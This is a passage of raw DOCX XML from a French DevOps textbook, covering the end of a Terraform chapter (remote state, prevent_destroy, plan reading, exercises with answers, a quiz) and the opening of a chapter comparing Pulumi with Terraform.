              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Par domaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Autonomie des équipes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coordination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="331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Tout dans un état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Simplicité initiale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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Risque et lenteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux états liés · hcl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Référencer un autre état</w:t>
        <w:br/>
        <w:t>data "terraform_remote_state" "reseau" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  backend = "s3"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  config = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    bucket = "mon-terraform-state"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    key    = "production/network/terraform.tfstate"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    region = "eu-west-3"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>resource "aws_instance" "app" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  subnet_id = data.terraform_remote_state.reseau.outputs.sous_reseau_id</w:t>
        <w:br/>
        <w:t>}</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DISCIPLINE TERRAFORM</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plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> relu avant chaque </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>apply</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, sans exception.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 état par environnement et par couche.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Modules épinglés par version.</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prevent_destroy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur les données critiques.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Aucun secret dans les fichiers </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.tf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>.</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Terraform compare configuration, état et réalité.</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L'état doit être distant, chiffré et verrouillé.</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L'état contient des données sensibles : jamais dans Git.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variables se typent et se valident.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module se versionne.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plan annonce créations, modifications et destructions.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remplacement détruit avant de créer.</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prevent_destroy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protège les ressources critiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Terraform décrit l'infrastructure dans un langage dédié. Le chapitre suivant montre l'approche par langage de programmation : Pulumi.</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74.1 — Écrire une ressource protégée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Une base de données ne doit jamais être détruite par erreur.</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>deletion_protection</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prevent_destroy</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le plan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 74.2 — Lire un plan dangereux</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Le plan annonce la destruction de trois ressources.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Identifiez les ressources.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Cherchez la cause.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Corrigez avant d'appliquer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 74.3 — Structurer plusieurs environnements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois environnements doivent partager le même code.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Créez un module.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Un état par environnement.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Des valeurs par environnement.</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74.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>resource "aws_db_instance" "main" {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  identifier          = "app-${var.environnement}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  engine              = "postgres"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  engine_version      = "16.3"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  instance_class      = "db.t3.micro"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  allocated_storage   = 20</w:t>
        <w:br/>
        <w:t xml:space="preserve">  deletion_protection = true</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  lifecycle {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    prevent_destroy = true</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ignore_changes  = [password]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ignore_changes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite un remplacement quand le mot de passe est géré ailleurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Toute tentative de destruction échoue à l'application, pas au plan : lisez le plan pour anticiper.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 74.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Plan: 1 to add, 0 to change, 3 to destroy.</w:t>
        <w:br/>
        <w:br/>
        <w:t>#  # aws_instance.app must be replaced</w:t>
        <w:br/>
        <w:t># -/+ resource "aws_instance" "app" {</w:t>
        <w:br/>
        <w:t>#        ami = "ami-0a1b2c3d" -&gt; "ami-9f8e7d6c" # forces replacement</w:t>
        <w:br/>
        <w:t>#    }</w:t>
        <w:br/>
        <w:br/>
        <w:t># Cause : l'AMI est un attribut immuable.</w:t>
        <w:br/>
        <w:t># Correction : accepter un remplacement contrôlé, ou figer l'AMI</w:t>
        <w:br/>
        <w:t># et planifier la migration avec un temps d'arrêt connu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un attribut immuable provoque un remplacement : c'est le cas de l'AMI, du type de sous-réseau, du nom d'identification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois destructions simultanées sur des ressources liées peuvent provoquer une indisponibilité : découpez en plusieurs applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 74.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>infra/</w:t>
        <w:br/>
        <w:t>├── modules/</w:t>
        <w:br/>
        <w:t>│   └── application/</w:t>
        <w:br/>
        <w:t>│       ├── main.tf</w:t>
        <w:br/>
        <w:t>│       ├── variables.tf</w:t>
        <w:br/>
        <w:t>│       └── outputs.tf</w:t>
        <w:br/>
        <w:t>├── environnements/</w:t>
        <w:br/>
        <w:t>│   ├── dev/</w:t>
        <w:br/>
        <w:t>│   │   ├── main.tf      # module "app" { source = "../../modules/application" }</w:t>
        <w:br/>
        <w:t>│   │   └── backend.tf   # key = "dev/terraform.tfstate"</w:t>
        <w:br/>
        <w:t>│   ├── staging/</w:t>
        <w:br/>
        <w:t>│   └── production/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque environnement a son propre état : une erreur en développement ne peut pas détruire la production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le module commun garantit que les trois environnements restent cohérents.</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 contient l'état Terraform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Le code source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L'association entre configuration et ressources réelles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Les secrets uniquement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Les journaux</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Pourquoi verrouiller l'état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Pour accélérer</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Pour éviter deux applications simultanées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Pour chiffrer</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Pour versionner</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>-/+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans un plan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Création</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Modification</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Remplacement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Suppression</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Où stocker un mot de passe utilisé par Terraform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 xml:space="preserve">Dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>variables.tf</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Dans un gestionnaire de secrets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Dans l'état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Dans un commentaire</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prevent_destroy</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Accélère la destruction</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Bloque la destruction planifiée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Sauvegarde l'état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Supprime l'état</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Il mémorise l'identifiant réel de chaque ressource créée.</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Deux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> concurrents corrompent l'état et créent des doublons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> La ressource est détruite puis recréée.</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Les valeurs sensibles se référencent depuis un coffre, jamais en clair.</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L'application échoue si la ressource doit être détruite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>75. Pulumi : l'infrastructure en langage de programmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Choisir quand un vrai langage apporte plus qu'un langage dédié, et l'utiliser sans perdre le contrôle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Avancé · Prérequis : chapitre 74</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Comparer Pulumi et Terraform sans dogmatisme.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Écrire un programme d'infrastructure lisible.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Réutiliser des fonctions et des boucles.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Gérer l'état et les secrets.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Tester une configuration d'infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>75.1 Même modèle, autre langage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pulumi repose sur le même principe que Terraform : un état, un plan, une application. La différence est le langage : TypeScript, Python, Go, C# au lieu d'un DSL déclaratif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.281 — Six différences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7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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Terraform (HCL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Pulumi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Langage</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Dédié, déclaratif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Généraliste</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Logique conditionnelle</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Limitée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boucles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>for_each</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Boucles natives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Tests</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Outils tiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Tests natifs du langage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Écosystème</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Très large</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Large, en croissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Courbe d'apprentissage</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Faible si HCL connu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Faible si le langage est connu</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LANGAGE DÉDIÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Langage conçu pour un domaine précis. Il limite les possibilités pour rendre les configurations prévisibles, ce qui est un avantage ou une contrainte selon le besoin.</w:t>
            </w:r>
          </w:p>
        </w:tc>
